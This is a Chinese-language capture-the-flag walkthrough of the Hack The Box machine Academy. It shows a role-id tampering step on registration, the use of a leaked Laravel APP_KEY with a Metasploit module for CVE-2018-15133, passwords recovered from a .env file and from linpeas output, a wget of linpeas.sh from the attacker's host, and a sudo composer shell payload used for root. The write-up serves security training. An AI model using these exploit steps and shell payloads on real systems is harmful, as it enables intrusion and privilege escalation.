0x00 信息收集

ip:10.10.10.215

开放端口:80和22

22端口hydra爆破失败:

80端口被重定向到academy.htb,修改/etc/hosts,进入以下界面:

使用目录扫描工具对其扫描,看剧吃完紫菜包饭三个草莓喝了点热水后,得到结果如下:

0x01 漏洞利用

注册时抓包,将roleid的值从0改为1。

使用该账号访问/admin.php,可成功登录:

最后一行有域名:dev-staging-01.academy.htb,将其也绑定到/etc/hosts上。得到页面如下:

对报错信息进行信息收集:

  • mysql的登录口令:homestead:secret(经测试无效)
  • APP_NAME “Laravel”
  • APP_KEY “base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=”

Laravel框架存在漏洞(CVE-2018-15133),可利用信息泄露得到的APP_KEY获取WebShell。

利用脚本:戳我

或使用msf,参考官方漏洞文档:戳我

  • use exploit/unix/http/laravel_token_unserialize_exec
  • set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
  • set rhost academy.htb
  • set lhost tun0
  • set vhost dev-staging-01.academy.htb
  • exploit

0x02 权限提升

python3 -c "import pty;pty.spawn('/bin/bash')"
  • cd ../../
  • cd academy
  • ls -a

/var/www/html/academy/.env文件夹中发现了数据库的密码(mySup3rP4s5w0rd!!)。

ls -a /home可以发现六个用户名,其中cry0l1t3和mrb3n在主页有被提到。使用su命令切换到cry0l1t3,密码为mySup3rP4s5w0rd!!

找到正在系统上运行的所有SUID可执行文件。

find / -user root -perm -4000 -print 2>/dev/null

无已知的可利用方式,卒。

查阅资料,找一个有写入权限的文件夹,下载提权辅助脚本linpeas.sh

  • cd /tmp
  • wget http://10.10.14.200:8000/linpeas.sh
  • chmod 777 linpeas.sh
  • ./linpeas.sh

运行后,发现了mrb3n账户的登录口令(mrb3n_Ac@d3my!):

使用sudo -l命令查看当前用户的特殊权限:

查阅文档:戳我 get到新的提权姿势:

TF=$(mktemp -d) 
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json 
sudo composer --working-dir=$TF run-script x

flag在/root中的root.txt里。